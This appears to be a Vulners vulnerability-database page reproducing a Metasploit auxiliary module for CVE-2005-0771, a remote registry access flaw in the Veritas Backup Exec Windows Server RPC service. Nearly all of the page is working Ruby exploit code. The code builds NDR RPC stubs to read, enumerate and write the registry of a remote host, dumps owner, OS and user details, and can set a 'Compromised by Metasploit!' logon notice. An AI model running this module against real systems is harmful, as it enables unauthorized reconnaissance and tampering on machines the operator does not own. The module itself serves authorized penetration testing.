Lucene search
K

Veritas Backup Exec Server Registry Access

🗓️ 02 Dec 2006 19:48:10Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 49 Views

Veritas Backup Exec Server Registry Access. Exploits remote registry access flaw. Discovered by Pedram Amini. Different attack modes available

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Post::Windows::Registry

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Veritas Backup Exec Server Registry Access',
      'Description'    => %q{
        This modules exploits a remote registry access flaw in the BackupExec Windows
      Server RPC service. This vulnerability was discovered by Pedram Amini and is based
      on the NDR stub information posted to openrce.org.
      Please see the action list for the different attack modes.

      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '17627' ],
          [ 'CVE', '2005-0771' ],
          [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],
        ],
      'Actions'     =>
        [
          ['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],
          ['Create Logon Notice', 'Description' => 'Add a logon notice']
        ],
      'DefaultAction' => 'System Information'
      ))

      register_options(
        [
          Opt::RPORT(6106),
          OptString.new('WARN',
            [
              false,
              "The warning to display for the Logon Notice action",
              "Compromised by Metasploit!\r\n"
            ]
          ),
        ])
  end

  def auxiliary_commands
    return {
      "regread" => "Read a registry value",
      # "regenum" => "Enumerate registry keys",
    }
  end

  def run
    case action.name
      when 'System Information'
        system_info()
      when 'Create Logon Notice'
        logon_notice()
    end
  end


  def cmd_regread(*args)

    if (args.length == 0)
      print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
      return
    end

    paths  = args[0].split("\\")
    hive   = paths.shift
    subval = paths.pop
    subkey = paths.join("\\")
    data   = backupexec_regread(hive, subkey, subval)

    if (data)
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
    end

  end

  def cmd_regenum(*args)

    if (args.length == 0)
      print_status("Usage: regenum HKLM\\\\Software")
      return
    end

    paths  = args[0].split("\\")
    hive   = paths.shift
    subkey = "\\" + paths.join("\\")
    data   = backupexec_regenum(hive, subkey)

    if (data)
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to enumerate #{hive}\\#{subkey}...")
    end

  end

  def system_info
    print_status("Dumping system information...")

    prod_id   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
    prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
    prod_sp   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
    owner     = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
    company   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
    cpu       = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
    username  = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'

    print_status("The current interactive user is #{deunicode(username)}")
    print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
    print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
    print_status("The system runs on a #{deunicode(cpu)}")
  end

  def logon_notice
    print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
    backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText',  REG_SZ, datastore['WARN'])
    backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption',  REG_SZ, 'METASPLOIT')
  end


  def deunicode(str)
    str.gsub(/\x00/, '').strip
  end

  #
  # Write a registry key
  #
  def backupexec_regwrite(hive, subkey, subval, type, data)
    stub = backupexec_regrpc_write(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type,
      :data => data
    )
    resp = backupexec_regrpc_call(5, stub)
    return false if resp.length == 0
    return true
  end

  #
  # Read a registry key
  #
  def backupexec_regread(hive, subkey, subval, type = REG_SZ)
    stub = backupexec_regrpc_read(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type
    )
    resp = backupexec_regrpc_call(4, stub)

    return nil if resp.length == 0
    ret, len = resp[0,8].unpack('VV')
    return nil if ret == 0
    return nil if len == 0
    return resp[8, len]
  end

  #
  # Enumerate a registry key
  #
  def backupexec_regenum(hive, subkey)
    stub = backupexec_regrpc_enum(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey
    )
    resp = backupexec_regrpc_call(7, stub)
    p resp

    return nil if resp.length == 0
    ret, len = resp[0,8].unpack('VV')
    return nil if ret == 0
    return nil if len == 0
    return resp[8, len]
  end

  #
  # Call the backupexec registry service
  #
  def backupexec_regrpc_call(opnum, data = '')

    handle = dcerpc_handle(
      '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
      'ncacn_ip_tcp', [datastore['RPORT']]
    )

    dcerpc_bind(handle)

    resp = dcerpc.call(opnum, data)
    outp = ''

    if (dcerpc.last_response and dcerpc.last_response.stub_data)
      outp = dcerpc.last_response.stub_data
    end

    disconnect

    outp
  end

  # RPC Service 4
  def backupexec_regrpc_read(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE
    type   = opts[:type]   || REG_SZ

    stub =
      NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(1024) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
    return stub
  end

  # RPC Service 7
  def backupexec_regrpc_enum(opts = {})
    subkey = opts[:subkey] || ''
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE
    stub =
      NDR.UnicodeConformantVaryingString(subkey) +
      NDR.long(4096) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
    return stub
  end

  # RPC Service 5
  def backupexec_regrpc_write(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE
    type   = opts[:type]   || REG_SZ
    data   = opts[:data]   || ''

    if (type == REG_SZ || type == REG_EXPAND_SZ)
      data = Rex::Text.to_unicode(data+"\x00")
    end

    stub =
      NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(data.length) +
      NDR.long(data.length) +
      data +
      NDR.align(data) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
    return stub
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation